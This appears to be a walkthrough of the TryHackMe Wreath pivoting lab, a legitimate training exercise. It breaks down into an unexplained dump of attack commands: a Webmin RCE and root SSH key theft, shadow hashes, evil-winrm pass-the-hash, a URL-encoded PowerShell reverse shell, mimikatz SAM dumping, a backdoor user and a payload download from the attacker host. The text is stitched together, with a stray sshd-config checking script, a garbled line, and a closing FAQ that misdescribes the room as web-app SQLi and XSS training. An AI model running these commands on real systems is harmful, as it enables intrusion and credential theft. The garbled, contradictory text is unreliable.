TryHackMe Wreath Network Walkthrough helps you learn how to pivot through a network by compromising a public-facing web machine and tunneling your traffic to access other machines in Wreath’s network. (Streak limitation only for non-subscribed users).
Access Wreath Network
Go to https://tryhackme.com/access?type=networks and download your VPN config file.

TryHackMe Wreath Walkthrough

TryHackMe Wreath Network

- Read the room description and objectives carefully: Before you start the room, take the time to read the room description and objectives carefully. This will give you a good idea of what you need to accomplish and what skills you will need to use.
- Take notes: As you work through the room, it can be helpful to take notes on the tools, techniques, and commands that you use. This can help you remember important details and troubleshoot any issues that arise.
- Use a web proxy: A web proxy such as Burp Suite can be very helpful for intercepting and modifying web traffic, which can help you identify and exploit vulnerabilities in the Wreath web application.
- Look for vulnerabilities: The Wreath web application contains several vulnerabilities that you will need to identify and exploit in order to complete the room. Look for clues in the web page source code, try various input values, and use web application security scanners such as OWASP ZAP to help you find vulnerabilities.
- Research: If you’re stuck on a particular step, don’t be afraid to do some research. Try searching for solutions to similar problems or vulnerabilities online, or look for documentation on the tools and techniques that you’re using.
Remember, the most important thing is to approach the room with a willingness to learn and a willingness to try new things. Don’t be discouraged if you encounter obstacles along the way – these are all opportunities to learn and improve your skills!
Let’s Hack!
Before starting, let’s create a folder to store all our files.
mkdir /home/kali/TryHackMe_Wreath
Enter the project folder:
cd /home/kali/TryHackMe_Wreath
Attacking Prod-Server
The production server is a Linux host. Let’s use nmap to scan for open ports and verify which services are running.
Scan the Host
Scan the prod-server using nmap and verify the services running on the remote machine.
nmap -sC -sV --script=vuln 10.200.193.200

Interesting result: the server is running an old Webmin version on port 10000.

Open Google and search for a Webmin exploit:
search webadmin 1.890
Download Exploit from here:
WebMin-1.890-Exploit-unauthorized-RCE
Webmin 1.890 exploit argument options:

Execute the python script and verify the system process and user.
python3 webmin-1.890_exploit.py 10.200.193.200 10000 "id;whoami"

After verifying we are root, let’s work on getting remote access to the machine. Execute the same script, but this time read the /etc/passwd file:
python3 webmin-1.890_exploit.py 10.200.193.200 10000 "cat /etc/passwd"

Now we have a list of system users we can use. Notice the user twreath: what is his password hash?
python3 webmin-1.890_exploit.py 10.200.193.200 10000 "cat /etc/shadow"

Great, we have two user password hashes. Let’s crack them.
root:$6$i9vT8tk3SoXXxK2P$HDIAwho9FOdd4QCecIJKwAwwh8Hwl.BdsbMOUAd3X/chSCvrmpfy.5lrLgnRVNq6/6g0PxK9VqSdy47/qKXad1
twreath:$6$0my5n311RD7EiK3J$zVFV3WAPCm/dBxzz0a7uDwbQenLohKiunjlDonkqx1huhjmFYZe0RmCPsHmW3OnWYwf8RWPdXAdbtYpkJCReg
Save both in password_hashes.txt.
Crack The Hashes
When the hash file is passed to john without further arguments, john auto-detects the hash format.
john password_hashes.txt
Verify whether john cracked any password:
john --show password_hashes.txt
No success cracking the hashes?
If it was possible to read the shadow file, maybe it is also possible to extract the root SSH RSA private key. Let’s try it!
Extract SSH Keys
Root SSH RSA Key
python3 webmin-1.890_exploit.py 10.200.193.200 10000 "cat /root/.ssh/id_rsa"

Copy the key content into the file prod-server.rsa and set the correct permissions:
chmod 600 prod-server.rsa

Log In to Prod-Server
Now we can log in to our production server. Here I will connect through SSH, creating a socks5 proxy on port 19850. This proxy will allow us to access all networks and hosts that prod-server can access.
ssh -i /home/kali/TryHackMe_Wreath/prod-server.rsa root@10.200.193.200 -D 19850


We are In as root 😀
Attack Prod-Server Description
We start by scanning the host prod-server with nmap and detect a vulnerable version of Webmin running on port 10000. We then search Google for a public exploit and use it to get RCE on the remote server. With the script we were able to extract the root SSH RSA key, log in as root on prod-server and create a socks5 proxy.
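Seen from the defender's side, the root key login and the `-D` SOCKS proxy described above depend on a few sshd settings. The following is an added example, not part of the original walkthrough: it checks an sshd_config for those settings, using a constructed sample config and evaluating only the global section before any Match block.

```python
# Added example: flag the sshd_config settings the pivot above depends on.
# SAMPLE_CONFIG is constructed for illustration, not taken from the lab host.
# OpenSSH defaults that apply when a keyword is absent from the file.
DEFAULTS = {
    "permitrootlogin": "prohibit-password",
    "pubkeyauthentication": "yes",
    "allowtcpforwarding": "yes",
}

SAMPLE_CONFIG = """\
Port 22
PermitRootLogin prohibit-password
#AllowTcpForwarding no
PasswordAuthentication no
Match User backup
    AllowTcpForwarding no
"""

def effective_global(config_text):
    """Global (pre-Match) values; sshd keeps the first occurrence of a keyword."""
    seen = {}
    for raw in config_text.splitlines():
        parts = raw.strip().replace("=", " ", 1).split()
        if not parts or parts[0].startswith("#"):
            continue  # blank line or comment
        if parts[0].lower() == "match":
            break  # conditional blocks are not evaluated here
        seen.setdefault(parts[0].lower(), " ".join(parts[1:]).lower())
    return {key: seen.get(key, default) for key, default in DEFAULTS.items()}

def pivot_findings(config_text):
    """Return one finding per setting that permits the key login or the tunnel."""
    cfg = effective_global(config_text)
    findings = []
    # "prohibit-password" only blocks password logins; a stolen root key still works.
    if cfg["pubkeyauthentication"] == "yes" and cfg["permitrootlogin"] in (
            "yes", "prohibit-password", "without-password"):
        findings.append("root key login allowed: PermitRootLogin " + cfg["permitrootlogin"])
    # "ssh -D" opens direct-tcpip channels, which "yes", "all" and "local" all allow.
    if cfg["allowtcpforwarding"] in ("yes", "all", "local"):
        findings.append("TCP forwarding allowed: AllowTcpForwarding " + cfg["allowtcpforwarding"])
    return findings

if __name__ == "__main__":
    for finding in pivot_findings(SAMPLE_CONFIG):
        print(finding)
```

On a live host, `sshd -T` prints the effective configuration, defaults included, and is the authoritative source for these values.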
Attacking Git Server
It’s time to attack the Git Server, but before that let’s configure proxychains so that we can use any tool against git-server.
If you want to use proxychains in strict mode, comment out the socks4 entry and add only the socks5 entry.
echo "socks5 127.0.0.1 19850" | sudo tee -a /etc/proxychains4.conf

An SSH proxy tunnel gives us a lot of flexibility when we are pivoting inside a network: we can keep a secure tunnel between our compromised machines and access any service on the network.

If we want to access the Git Server directly from our browser, we need to set up FoxyProxy to use the new socks5 proxy created by the SSH tunnel.

Now we can access the Git Server directly in our browser.
Remember: any tool we use to attack the Git Server must use our local socks5 proxy (127.0.0.1:19850), created by our SSH tunnel into the prod-server host.
After configuring FoxyProxy to use our proxy, open the Git Server IP in the browser.
http://10.200.193.150
We get an error page, but notice it has some juicy info: it is using Django and mentions some new directories. Let’s investigate it!

http://10.200.193.150/gitstack
Scan Git Server with Nmap
proxychains4 nmap 10.200.193.150 --top-ports 1023 -sT -n -PS --script=vuln

As we know, GitStack is running on port 80, so let’s search for an exploit using the searchsploit tool.
searchsploit gitstack

We found 3 possible GitStack exploits. Let’s copy the third one into our current folder:
searchsploit -m php/webapps/43777.py
mv 43777.py exploit_GitStack.py
proxychains4 python exploit_GitStack.py
proxychains4 curl -X POST http://10.200.193.150/rest/user/ -d 'username=RFS;password=RFS'
proxychains4 ruby /home/kali/evil-winrm/evil-winrm.rb -u RFS -p RFS -i 10.200.193.150
proxychains4 ruby /home/kali/evil-winrm/evil-winrm.rb -u Administrator -H 37db63-RFS-a8461e05c-RFS -i 10.200.193.150
proxychains4 xfreerdp /v:10.200.193.150 /u:RFS /p:RFS +clipboard /dynamic-resolution /drive:/home/kali/TryHackMe_Wreath/share
firewall-cmd --zone=public --add-port 19850/tcp
firewall-cmd --zone=public --add-port 19851/tcp
scp -i key socat root@10.200.193.200:/tmp
./tmp/socat-rfs tcp-l:19851,fork,reuseaddr tcp:10.50.190.121:19851
proxychains4 curl -X POST http://10.200.193.150/web/exploit.php -d 'a=powershell%20-nop%20-c%20%22%24client%20%3D%20New-Object%20System.Net.Sockets.TCPClient%28%2710.200.193.200%27%2C19850%29%3B%24stream%20%3D%20%24client.GetStream%28%29%3B%5Bbyte%5B%5D%5D%24bytes%20%3D%200..65535%7C%25%7B0%7D%3Bwhile%28%28%24i%20%3D%20%24stream.Read%28%24bytes%2C%200%2C%20%24bytes.Length%29%29%20-ne%200%29%7B%3B%24data%20%3D%20%28New-Object%20-TypeName%20System.Text.ASCIIEncoding%29.GetString%28%24bytes%2C0%2C%20%24i%29%3B%24sendback%20%3D%20%28iex%20%24data%202%3E%261%20%7C%20Out-String%20%29%3B%24sendback2%20%3D%20%24sendback%20%2B%20%27PS%20%27%20%2B%20%28pwd%29.Path%20%2B%20%27%3E%20%27%3B%24sendbyte%20%3D%20%28%5Btext.encoding%5D%3A%3AASCII%29.GetBytes%28%24sendback2%29%3B%24stream.Write%28%24sendbyte%2C0%2C%24sendbyte.Length%29%3B%24stream.Flush%28%29%7D%3B%24client.Close%28%29%22'
mkdir /home/kali/TryHackMe_Wreath/share
proxychains4 xfreerdp /v:10.200.193.150 /u:RFS /p:RFS +clipboard /dynamic-resolution /drive:/home/kali/TryHackMe_Wreath/share
Send Mimikatz through file share or SCP
privilege::debug
token::elevate
lsadump::sam
proxychains4 curl -X POST http://10.200.193.150/web/exploit-rfs.php -d 'a=whoami'
proxychains4 curl -X POST http://10.200.193.150/web/exploit-rfs.php -d 'a=net user RFS RFS /add'
Maintend
Attacking WREATH-PC
http://10.200.193.100
http://10.200.193.100/resources
Username: Thomas
Password - Crack the Hash
powershell.exe -c "(new-object System.Net.WebClient).DownloadFile('http://10.50.190.121/PrintSpoofer64-rfs.exe','C:\xampp\htdocs\resources\uploads\PrintSpoofer64-rfs.exe')"
What is the Wreath room on TryHackMe?
Wreath is a beginner-level room on TryHackMe that focuses on web application security and vulnerability exploitation. The room is designed to help users develop their skills in identifying and exploiting common web application vulnerabilities such as SQL injection, cross-site scripting (XSS), and file inclusion vulnerabilities.
Do I need any prior knowledge or experience to complete the Wreath room?
The Wreath room is designed for beginners, so you don’t need any prior knowledge or experience in web application security or vulnerability exploitation. However, it may be helpful to have a basic understanding of web technologies such as HTML, CSS, and JavaScript, as well as some experience using a Linux command line.
What tools do I need to complete the Wreath room?
You’ll need a web browser, a text editor, and a Linux-based virtual machine such as VirtualBox or VMware. You may also want to use web application security tools such as OWASP ZAP or Burp Suite to help you identify and exploit vulnerabilities in the Wreath web application.
Can I get stuck in the Wreath room?
Yes, it’s possible to get stuck on some of the tasks in the Wreath room, especially if you’re new to web application security and vulnerability exploitation. However, there are many resources available to help you, such as online forums, documentation, and tutorials. You can also reach out to the TryHackMe community for assistance.
Can I work on the Wreath room with others?
Yes, you can work on the Wreath room with others by creating a team or joining an existing team on the TryHackMe platform. This can be a great way to learn from others and share your knowledge and skills.
What should I do after completing the Wreath room?
After completing the Wreath room, you can continue to develop your skills in web application security and vulnerability exploitation by working on other TryHackMe rooms, participating in online forums and communities, and exploring additional resources such as online courses and certifications.